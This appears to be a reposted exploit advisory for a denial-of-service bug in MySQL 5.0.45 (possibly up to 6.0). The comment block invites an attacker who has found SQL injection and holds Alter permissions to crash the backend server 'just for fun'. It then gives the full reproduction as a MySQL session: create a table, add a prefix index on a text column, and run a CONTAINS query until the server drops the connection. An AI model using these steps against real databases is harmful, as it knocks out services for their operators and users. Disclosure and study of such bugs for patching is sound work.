mysql 5.0.45 （修改）拒绝服务漏洞

/*

* MySQL <=6.0 possibly affected

* Kristian Erik Hermansen

* Credit: Joe Gallo

* You must have Alter permissions to exploit this bug!

* Scenario: You found SQL injection, but you want to punch backend server

* in the nuts just for fun. Start with the Alter TABLE statement on

* a table and field you know to exist. The first two SQL statements are

* simply to demostrate reproducibility...

*/

<snip>

mysql> Create TABLE `test` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,

`foo` text NOT NULL

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));

Query OK, 0 rows affected

Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

ERROR 2013 : Lost connection to MySQL server during query

</snip>